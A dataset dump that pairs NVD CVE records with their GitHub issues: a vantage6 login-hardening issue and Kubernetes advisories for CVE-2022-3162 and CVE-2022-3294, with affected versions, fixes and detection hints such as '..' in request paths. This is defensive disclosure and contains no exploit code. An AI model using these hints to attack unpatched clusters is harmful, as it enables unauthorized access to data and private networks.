"matchCriteriaId": "64A8E6A5-5CBD-43FB-BC80-BA7CC812E0F4",
"versionEndExcluding": "3.8.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "3.3.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"203"
] | 203 | https://github.com/vantage6/vantage6/issues/59 | [
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"vantage6",
"vantage6"
] | Attackers can currently do unlimited attempts to retrieve user passwords. There are a few good practices we may add to improve this.
I think the following would be nice:
- [x] Do not show message 'username does not exist' as it can inform attacker which usernames actually have accounts
- [x] Maximum number of login attempts: 5, then block 15min (except when reset via email)*
- [x] Minimum password length: 8
- [x] Maximum password length: 128 (https://www.acunetix.com/vulnerabilities/web/long-password-denial-of-service/)
- [x] Include special character (0-9a-zA-Z special characters)
- [x] Make sure that when creating new server, root user is properly created
*these are default values that may be adapted in the server config file | Improve login requirements | https://api.github.com/repos/vantage6/vantage6/issues/59/comments | 4 | 2021-12-01T13:05:12Z | 2022-08-11T09:55:40Z | https://github.com/vantage6/vantage6/issues/59 | 1,237,077,821 | 59 | 4,785 |
CVE-2022-3162 | 2023-03-01T19:15:25.457 | Users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different type in the same API group without authorization. Clusters are impacted by this vulnerability if all of the following are true: 1. There are 2+ CustomResourceDefinitions sharing the same API group 2. Users have cluster-wide list or watch authorization on one of those custom resources. 3. The same users are not authorized to read another custom resource in the same API group. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "jordan@liggitt.net",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "jordan@liggitt.net",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/113756"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/iUd550j7kjA"
},
{
"source": "jordan@liggitt.net",
"tags": null,
"url": "https://security.netapp.com/advisory/ntap-20230511-0004/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/113756"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/iUd550j7kjA"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://security.netapp.com/advisory/ntap-20230511-0004/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1780A92B-C6FB-410B-8374-88D1D296816A",
"versionEndExcluding": null,
"versionEndIncluding": "1.22.15",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A09EA928-A8A1-4CEC-A16F-AD65BD31A9D4",
"versionEndExcluding": null,
"versionEndIncluding": "1.23.13",
"versionStartExcluding": null,
"versionStartIncluding": "1.23.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DDE00AE9-4CCC-49AA-B5D4-80A6FAE0FCB1",
"versionEndExcluding": null,
"versionEndIncluding": "1.24.7",
"versionStartExcluding": null,
"versionStartIncluding": "1.24.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A01548FA-CE9A-4ACB-8AC5-C85F16BC134B",
"versionEndExcluding": null,
"versionEndIncluding": "1.25.3",
"versionStartExcluding": null,
"versionStartIncluding": "1.25.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/kubernetes/kubernetes/issues/113756 | [
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"kubernetes",
"kubernetes"
] | CVSS Rating: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
A security issue was discovered in Kubernetes where users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different type in the same API group without authorization.
### Am I vulnerable?
Clusters are impacted by this vulnerability if all of the following are true:
- There are 2+ CustomResourceDefinitions sharing the same API group
- Users have cluster-wide list or watch authorization on one of those custom resources.
- The same users are not authorized to read another custom resource in the same API group.
#### Affected Versions
- Kubernetes kube-apiserver <= v1.25.3
- Kubernetes kube-apiserver <= v1.24.7
- Kubernetes kube-apiserver <= v1.23.13
- Kubernetes kube-apiserver <= v1.22.15
### How do I mitigate this vulnerability?
Upgrading the kube-apiserver to a fixed version mitigates this vulnerability.
Prior to upgrading, this vulnerability can be mitigated by avoiding granting cluster-wide list and watch permissions.
#### Fixed Versions
- Kubernetes kube-apiserver v1.25.4
- Kubernetes kube-apiserver v1.24.8
- Kubernetes kube-apiserver v1.23.14
- Kubernetes kube-apiserver v1.22.16
### Detection
Requests containing `..` in the request path are a likely indicator of exploitation. Request paths may be captured in API audit logs, or in kube-apiserver HTTP logs.
If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io
#### Acknowledgements
This vulnerability was reported by Richard Turnbull of NCC Group as part of the Kubernetes Audit.
<!-- labels -->
/area security
/kind bug
/committee security-response
/label official-cve-feed
/sig api-machinery
/area apiserver
| CVE-2022-3162: Unauthorized read of Custom Resources | https://api.github.com/repos/kubernetes/kubernetes/issues/113756/comments | 17 | 2022-11-08T21:33:07Z | 2022-12-08T03:40:09Z | https://github.com/kubernetes/kubernetes/issues/113756 | 1,440,934,711 | 113,756 | 4,786 |
CVE-2022-3294 | 2023-03-01T19:15:25.570 | Users may have access to secure endpoints in the control plane network. Kubernetes clusters are only affected if an untrusted user can modify Node objects and send proxy requests to them. Kubernetes supports node proxying, which allows clients of kube-apiserver to access endpoints of a Kubelet to establish connections to Pods, retrieve container logs, and more. While Kubernetes already validates the proxying address for Nodes, a bug in kube-apiserver made it possible to bypass this validation. Bypassing this validation could allow authenticated requests destined for Nodes to to the API server's private network. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.7,
"impactScore": 5.9,
"source": "jordan@liggitt.net",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "jordan@liggitt.net",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/113757"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/VyPOxF7CIbA"
},
{
"source": "jordan@liggitt.net",
"tags": null,
"url": "https://security.netapp.com/advisory/ntap-20230505-0007/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/113757"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/VyPOxF7CIbA"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://security.netapp.com/advisory/ntap-20230505-0007/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38E275C4-8711-435F-85D8-073116D467CF",
"versionEndExcluding": "1.22.16",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16AF218C-A7AD-4A8A-9F97-A89D1ADC6C67",
"versionEndExcluding": "1.23.14",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.23.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FD71BF6D-ABA3-4974-856B-10B9450C741F",
"versionEndExcluding": "1.24.8",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.24.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "105810A5-2E62-441A-B07B-9F8A0E774712",
"versionEndExcluding": "1.25.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.25.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"20"
] | 20 | https://github.com/kubernetes/kubernetes/issues/113757 | [
"Patch",
"Vendor Advisory"
] | github.com | [
"kubernetes",
"kubernetes"
] | CVSS Rating: [CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)
A security issue was discovered in Kubernetes where users may have access to secure endpoints in the control plane network. Kubernetes clusters are only affected if an untrusted user can modify Node objects and send proxy requests to them.
Kubernetes supports node proxying, which allows clients of kube-apiserver to access endpoints of a Kubelet to establish connections to Pods, retrieve container logs, and more. While Kubernetes already validates the proxying address for Nodes, a bug in kube-apiserver made it possible to bypass this validation. Bypassing this validation could allow authenticated requests destined for Nodes to to the API server's private network.
### Am I vulnerable?
Clusters are affected by this vulnerability if there are endpoints that the kube-apiserver has connectivity to that users should not be able to access. This includes:
- kube-apiserver is in a separate network from worker nodes
- localhost services
mTLS services that accept the same client certificate as nodes may be affected. The severity of this issue depends on the privileges & sensitivity of the exploitable endpoints.
Clusters that configure the egress selector to use a proxy for cluster traffic may not be affected.
#### Affected Versions
- Kubernetes kube-apiserver <= v1.25.3
- Kubernetes kube-apiserver <= v1.24.7
- Kubernetes kube-apiserver <= v1.23.13
- Kubernetes kube-apiserver <= v1.22.15
### How do I mitigate this vulnerability?
Upgrading the **kube-apiserver** to a fixed version mitigates this vulnerability.
Aside from upgrading, configuring an [egress proxy for egress to the cluster network](https://kubernetes.io/docs/tasks/extend-kubernetes/setup-konnectivity/) can mitigate this vulnerability.
#### Fixed Versions
- Kubernetes kube-apiserver v1.25.4
- Kubernetes kube-apiserver v1.24.8
- Kubernetes kube-apiserver v1.23.14
- Kubernetes kube-apiserver v1.22.16
**Fix impact:** In some cases, the fix can break clients that depend on the nodes/proxy subresource, specifically if a kubelet advertises a localhost or link-local address to the Kubernetes control plane.
### Detection
Node create & update requests may be included in the Kubernetes audit log, and can be used to identify requests for IP addresses that should not be permitted. Node proxy requests may also be included in audit logs.
If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io
#### Acknowledgements
This vulnerability was reported by Yuval Avrahami of Palo Alto Networks.
<!-- labels -->
/area security
/kind bug
/committee security-response
/label official-cve-feed
/sig api-machinery
/area apiserver | CVE-2022-3294: Node address isn't always verified when proxying | https://api.github.com/repos/kubernetes/kubernetes/issues/113757/comments | 2 | 2022-11-08T21:33:26Z | 2023-04-27T08:27:18Z | https://github.com/kubernetes/kubernetes/issues/113757 | 1,440,935,103 | 113,757 | 4,787 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.